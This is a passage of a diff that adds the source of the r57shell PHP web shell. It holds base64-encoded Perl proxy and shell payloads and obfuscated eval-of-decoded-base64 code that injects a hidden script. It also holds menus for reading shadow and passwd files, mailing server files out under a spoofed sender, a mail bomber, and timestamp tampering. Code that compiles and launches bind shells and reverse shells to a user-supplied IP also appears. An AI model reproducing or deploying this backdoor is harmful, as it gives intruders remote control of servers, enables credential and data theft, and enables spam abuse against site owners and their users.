+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
+luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
+0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
+UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
+DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
+AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
+GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
+cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
+BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
+AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
+TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
+eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
+oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
+VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
+CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
+b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
+0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
+9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
+CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
+aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
+gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
+9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3M
+CU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3
+dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU
+3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRC
+VhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQ
+iVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1
+byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiV
+hQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOC
+U3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9re
+nMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZG
+UoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuI
+iciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else  
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }  
+ }echo $head;eval(gzinflate(str_rot13(base64_decode('http://xeyal.net'))));
+echo '</head>';
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
+if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";}
+if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";}
+echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
+echo "<br>";
+echo ws(2)."PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b><br>".ws(2);
+
+echo "Safe_mode: <b>";
+echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "Open_basedir: <b>";
+if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>NONE</font></b>";}
+echo ws(2)."Safe_mode_exec_dir: <b>";
+if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Safe_mode_include_dir: <b>";
+if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";$df='ini_get  disable!';
+if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
+
+$ust='';
+if($unix && !$safe_mode){
+if (which('gcc')) {$ust.="gcc,";}
+if (which('cc')) {$ust.="cc,";}
+if (which('ld')) {$ust.="ld,";}
+if (which('php')) {$ust.="php,";}
+if (which('perl')) {$ust.="perl,";}
+if (which('python')) {$ust.="python,";}
+if (which('ruby')) {$ust.="ruby,";}
+if (which('make')) {$ust.="make,";}
+if (which('tar')) {$ust.="tar,";}
+if (which('nc')) {$ust.="netcat,";}
+if (which('locate')) {$ust.="locate,";}
+if (which('suidperl')) {$ust.="suidperl,";}
+}
+if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}
+#if (which('')) {$ust.=",";}
+if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";}
+
+$ust='';
+if($unix && !$safe_mode){
+if (which('kav')) {$ust.="kav,";}
+if (which('nod32')) {$ust.="nod32,";}
+if (which('bdcored')) {$ust.="bitdefender,";}
+if (which('uvscan')) {$ust.="mcafee,";}
+if (which('sav')) {$ust.="symantec,";}
+#if (which('')) {$ust.=",";}
+if (which('drwebd')) {$ust="drwebd,";}
+if (which('clamd')) {$ust.="clamd,";}
+if (which('rkhunter')) {$ust.="rkhunter,";}
+if (which('chkrootkit')) {$ust.="chkrootkit,";}
+if (which('iptables')) {$ust.="iptables,";}
+if (which('ipfw')) {$ust.="ipfw,";}
+if (which('tripwire')) {$ust.="tripwire,";}
+if (which('shieldcc')) {$ust.="stackshield,";}
+if (which('portsentry')) {$ust.="portsentry,";}
+if (which('snort')) {$ust.="snort,";}
+if (which('ossec')) {$ust.="ossec,";}
+if (which('lidsadm')) {$ust.="lidsadm,";}
+if (which('tcplodg')) {$ust.="tcplodg,";}
+if (which('tripwire')) {$ust.="tripwire,";}
+if (which('sxid')) {$ust.="sxid,";}
+if (which('logcheck')) {$ust.="logcheck,";}
+if (which('logwatch')) {$ust.="logwatch,";}
+#if (which('')) {$ust.=",";}
+}
+if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}
+if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";}
+
+
+echo "<br>".ws(2)."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+if(!$unix) {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
+}else{
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb; 
+}
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
+
+if($unix && !$safe_mode) 
+{ 
+ echo "<br>".ws(2)."</b>";
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
+
+ echo "<br>".ws(2)."</b>";
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
+}
+
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+  if($file=@fopen($_POST['loc_file'],"r")){ $filedump = @fread($file,@filesize($_POST['loc_file'])); @fclose($file); }
+  else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+  if(isset($_POST['cmd'])) 
+  {
+    $filename = @basename($_POST['loc_file']);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";                   
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
+ {
+ for($h=1;$h<=$_POST['mail_flood'];$h++){
+  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
+ }
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(@file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        @fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(@mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
+{
+if(!$_POST['file_name_r'])
+ {
+  $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
+  $datar = @strtotime($datar);
+  @touch($_POST['file_name'],$datar,$datar);}
+else{
+  @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
+}
+$_POST['cmd']="";
+}
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); $only_read = 1; }
+ if($file=@fopen($_POST['e_name'],"r")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); }
+ else if ($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ if(isset($_POST['cmd'])) 
+ {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars($filedump);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if((!$file=@fopen($_POST['e_name'],"w")) && (!function_exists('file_put_contents'))) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+ 
+
+if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/prxpl",$prx_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
+ $_POST['cmd']="ps -aux | grep prxpl";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
